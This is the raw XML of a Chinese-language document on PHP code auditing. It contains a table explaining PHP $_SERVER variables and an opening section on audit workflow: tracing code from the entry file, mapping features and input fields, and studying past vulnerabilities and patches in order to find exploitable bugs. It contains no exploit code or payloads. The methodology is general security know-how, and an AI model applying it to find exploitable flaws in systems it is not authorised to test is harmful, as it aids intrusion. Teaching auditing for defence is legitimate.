                <w:spacing w:val="-12"/>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId12">
              <w:r>
                <w:rPr>
                  <w:sz w:val="15"/>
                  <w:lang w:eastAsia="zh-CN"/>
                </w:rPr>
                <w:t>www.w3school.com.cn</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>）。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$_SERVER['SERVER_SOFTWARE']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2"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>返回服务器标识字符串（比如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> Apache/2.2.24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="817"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="15"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:ind w:left="667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$_SERVER['SERVER_PROTOCOL']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6" w:line="302" w:lineRule="auto"/>
              <w:ind w:left="1470" w:right="597" w:hanging="951"/>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:w w:val="95"/>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>返回请求页面时通信协议的名称和版本（例如，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:w w:val="95"/>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>“HTTP/1.0”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>）。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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>REQUEST_METHOD']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返回访问页面使用的请求方法（例如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>）。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6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$_SERVER['REQUEST_TIME']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6"/>
              <w:ind w:right="267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返回请求开始时的时间戳（例如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1577687494</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="489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7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$_SERVER['QUERY_STRING']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7"/>
              <w:ind w:right="276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返回查询字符串，如果是通过查询字符串</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>访问此</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>页面。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="251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4016"/>
        <w:gridCol w:w="4206"/>
      </w:tblGrid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$_SERVER['HTTP_ACCEPT']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返回来自当前请求的请求头。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="817"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="10"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:ind w:left="669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$_SERVER['HTTP_ACCEPT_CHARSET']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 w:line="300" w:lineRule="auto"/>
              <w:ind w:left="1321" w:right="556" w:hanging="742"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>返回来自当前请求的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> Accept_Charset </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>头（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>例</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> utf-8,ISO-8859-1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>）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$_SERVER['HTTP_HOST']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返回来自当前请求的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Host </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>头。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="817"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="10"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0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$_SERVER['HTTP_REFERER']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 w:line="300" w:lineRule="auto"/>
              <w:ind w:left="1720" w:hanging="1575"/>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:w w:val="95"/>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>返回当前页面的完整</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:w w:val="95"/>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:w w:val="95"/>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>（不可靠，因为不是所有用户代理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:w w:val="95"/>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>都支持）。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$_SERVER['HTTPS']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是否通过安全</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> HTTP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>协议查询脚本。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$_SERVER['REMOTE_ADDR']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返回浏览当前页面的用户的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>地址。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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>REMOTE_HOST']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6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返回浏览当前页面的用户的主机名。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$_SERVER['REMOTE_PORT']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right="272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返回用户机器上连接到</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>服务器所使用的端口号。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$_SERVER['SCRIPT_FILENAME']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返回当前执行脚本的绝对路径。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="817"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="14"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="81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$_SERVER['SERVER_ADMIN']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 w:line="302" w:lineRule="auto"/>
              <w:ind w:left="1180" w:right="675" w:hanging="370"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>该值指明了</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> Apache </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>服务器配置文件中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> SERVER_ADMIN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>参数。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2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$_SERVER['SERVER_PORT']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2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 xml:space="preserve">Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>服务器使用的端口。默认值为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> “80”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>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left="667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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>SERVER_SIGNATURE']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返回服务器版本和虚拟主机名。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7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$_SERVER['PATH_TRANSLATED']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7"/>
              <w:ind w:right="276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当前脚本所在文件系统（非文档根目录）的基本路径。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$_SERVER['SCRIPT_NAME']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返回当前脚本的路径。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="491"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="401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left="664" w:right="654"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>$_SERVER['SCRIPT_URI']</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4206" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="79"/>
              <w:ind w:right="274"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>返回当前页面的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> URI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1120" w:left="1380" w:header="0" w:footer="93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14"/>
          <w:lang w:eastAsia="zh-CN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32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="审计之初"/>
      <w:bookmarkStart w:id="8" w:name="_bookmark3"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>审计之初</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="39"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="837" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>审计流程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="236"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代码审计的目的是以挖掘到可以利用的漏洞，所以我们不必通篇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的去将代码完全看懂，但是在开始之前做一些准备还是必须，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>就像渗</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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透之前，我们也需要收集足够多的目标信息，利用工具和制定渗透计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划一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="76" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317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通常情况下在刚开始练习审计时，拿到一套源码，马上做的事情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就是，丢到工具里，去扫敏感的函数，然后去一个一个的回溯它，找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到入口点。但是，这样审计了几套源码，会发现这个方法很浪费时间，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因为每次都要在回溯过程中，不断的去寻找源码中定义的一些通用函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数。由于不了解整个源码的流程，导致在找这些通用函数的过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程中浪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费了很多的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时间与精力。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="76" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="306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所以，需要重新调整审计流程。在拿到源码之后，先从它开始的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地方（一般是根目录下的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index </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件）按照执行的顺序去读代码，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一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直到它的初始化内容，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和基本功能实现完毕为止。这样，可以明确的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了解整套源码的结构，哪一种函数文件放在哪个文件夹下；知道通用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pacing w:val="-3"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数放在哪个文件中。这对我们在之后阅读“疑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-3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pacing w:val="-3"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>似”有问题的代码时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-3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有很好的帮助，例如，在看到一个通用函数时，我们可以快速的切换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到通用函数文件，查找这个函数的实现代码。这个方法带来好处还有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好多，这里就不一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一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列出了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="837" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>审计了解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="92"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流程的优化可以帮助我们在之后审计的过程中，免去时间和精力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上不必要的浪费。而在深入阅读代码之前，了解整套代码的每一个功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能点，每一个输入框和他曾经出现的漏洞及相关修补方案，将会大大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提高我们在之后的审计效率。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="both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20" w:left="1380" w:header="0" w:footer="938" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="76" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="338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lastRenderedPageBreak/>
        <w:t>在了解源码的每个功能时，如果你能够注意以观察</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的变化，也许能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-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你在后面的阅读带代码过程中跳过很多没用的分支。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="74" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="239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而在测试每一个输入框时，如果你仔细观察</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>源码中输入框的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，这也许能帮你在后面的审计过程中更快的定位到利用点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="57" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="239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尝试了解这套源码曾经出现过的漏洞，以及相关的修补方案，这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是代码审计中的一条不错的捷径。因为一套源码虽然可能不是一个人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完成的，但是它肯定是基于一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个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>框架的，为这套源码编码的程序员们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都会围绕着这个框架进行开发，他们肯定必须要遵守框架的规则，而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3"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了解这些曾经出现过的这些漏洞，说不定可以发现他们所</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-3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共有的陋习。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7"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如果你能够了解这些漏洞修补的详细细节，那就更好了，因为随着</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>平台的升级变迁，或者新的技术出现，这些修补也许就会变成摆设。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7"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="11"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="837" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>制定计划</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
